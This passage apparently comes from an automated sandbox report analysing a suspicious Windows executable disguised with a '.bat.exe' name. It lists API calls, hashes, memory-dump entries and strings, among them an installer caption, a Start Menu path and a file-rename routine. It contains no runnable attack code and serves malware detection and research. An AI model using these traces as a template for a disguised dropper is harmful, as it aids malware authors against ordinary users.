                            • API String ID: 2492992576-0
                            • Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                            • Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
                            • Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                            • Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D
                            APIs
                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
                            • Instruction ID: 4f2bdf6dfe5cf4b60dd5b7335af101e6a5cbd4d7fd56710333224b44724b1ee5
                            • Opcode Fuzzy Hash: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
                            • Instruction Fuzzy Hash: BFD05B73B101419BD714E7F8B98485F73B4DB503153204837D441E2091D578C5424A28
                            APIs
                            • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                            • GetDlgItem.USER32(?,00000408), ref: 00404A67
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                            • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                            • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                            • DeleteObject.GDI32(00000000), ref: 00404B3A
                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                            • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                            • ShowWindow.USER32(?,00000005), ref: 00404C93
                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404E63
                            • GlobalFree.KERNEL32(00000000), ref: 00404E73
                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                            • InvalidateRect.USER32(?,00000000,?), ref: 00404FC4
                            • ShowWindow.USER32(?,00000000), ref: 00405012
                            • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                            • ShowWindow.USER32(00000000), ref: 00405024
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 1638840714-813528018
                            • Opcode ID: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                            • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                            • Opcode Fuzzy Hash: 108f0c184bcf7ed6d9d4fb864c0bf3485061875d4b02c085815a1bca3aa8a10b
                            • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                            APIs
                            • GetDlgItem.USER32(?,000003FB), ref: 00404520
                            • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                            • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                            • CoTaskMemFree.OLE32(00000000), ref: 00404606
                            • lstrcmpiA.KERNEL32(Call,Inquiring Setup: Installing), ref: 00404638
                            • lstrcatA.KERNEL32(?,Call), ref: 00404644
                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                              • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3
                              • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                              • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                              • Part of subcall function 0040620A: CharNextA.USER32(?,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                              • Part of subcall function 0040620A: CharPrevA.USER32(?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                            • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,?,00429840,?,?,000003FB,?), ref: 00404714
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                              • Part of subcall function 00404888: lstrlenA.KERNEL32(Inquiring Setup: Installing,Inquiring Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                              • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                              • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,Inquiring Setup: Installing), ref: 00404941
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$Call$Inquiring Setup: Installing
                            • API String ID: 2624150263-4265126013
                            • Opcode ID: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                            • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                            • Opcode Fuzzy Hash: 35ccfcd12aa65a6056ea3b79a366237fc8f8bc1b83ab477f5d53117e16670a8d
                            • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                            APIs
                              • Part of subcall function 73A31215: GlobalAlloc.KERNEL32(00000040,73A31233,?,73A312CF,-73A3404B,73A311AB,-000000A0), ref: 73A3121D
                            • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 73A31BA2
                            • lstrcpyA.KERNEL32(00000008,?), ref: 73A31BEA
                            • lstrcpyA.KERNEL32(00000408,?), ref: 73A31BF4
                            • GlobalFree.KERNEL32(00000000), ref: 73A31C07
                            • GlobalFree.KERNEL32(?), ref: 73A31CE7
                            • GlobalFree.KERNEL32(?), ref: 73A31CEC
                            • GlobalFree.KERNEL32(?), ref: 73A31CF1
                            • GlobalFree.KERNEL32(00000000), ref: 73A31ED8
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: Global$Free$Alloclstrcpy
                            • String ID:
                            • API String ID: 852173138-0
                            • Opcode ID: c2f5824b60f5c09b1eb3f41acbdf16276bbc49783599cc0063a3f57f971a0cb3
                            • Instruction ID: ed4532af69efc4a96380670f8aa125b9b2ed919e111b8f9bbc344a459732e5c1
                            • Opcode Fuzzy Hash: c2f5824b60f5c09b1eb3f41acbdf16276bbc49783599cc0063a3f57f971a0cb3
                            • Instruction Fuzzy Hash: C112BE71D0420A9FDB11AFA4C9867AEBBF4FB0A305F94852FD197E3288D7709942CB40
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
                            • Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
                            • Opcode Fuzzy Hash: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
                            • Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                            • Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
                            • Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                            • Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                            • Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
                            • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                            • Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95
                            APIs
                            • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404235
                            • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                            • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404267
                            • GetSysColor.USER32(?), ref: 00404278
                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                            • lstrlenA.KERNEL32(?), ref: 00404299
                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                            • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                            • SendMessageA.USER32(00000000), ref: 00404322
                            • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                            • SendMessageA.USER32(00000000,?,00000000,00000201), ref: 0040438D
                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                            • SetCursor.USER32(00000000), ref: 004043A5
                            • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                            • SetCursor.USER32(00000000), ref: 004043BE
                            • SendMessageA.USER32(00000111,?,00000000), ref: 004043EA
                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: Call$N$uA@
                            • API String ID: 3103080414-2405949017
                            • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                            • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                            • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                            • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                            APIs
                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32(?,?), ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextA.USER32(00000000,Inquiring Setup,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F$Inquiring Setup
                            • API String ID: 941294808-1460695295
                            • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                            • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                            • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                            • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                            • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49
                              • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                              • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                            • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
                            • wsprintfA.USER32 ref: 00405C84
                            • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                            • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                            • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                              • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405B3D
                              • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %s=%s$[Rename]
                            • API String ID: 2171350718-1727408572
                            • Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                            • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                            • Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                            • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                            APIs
                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                            • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                            • CharNextA.USER32(?,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                            • CharPrevA.USER32(?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                            Strings
                            • *?|<>/":, xrefs: 00406252
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
                            • "C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00406246
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
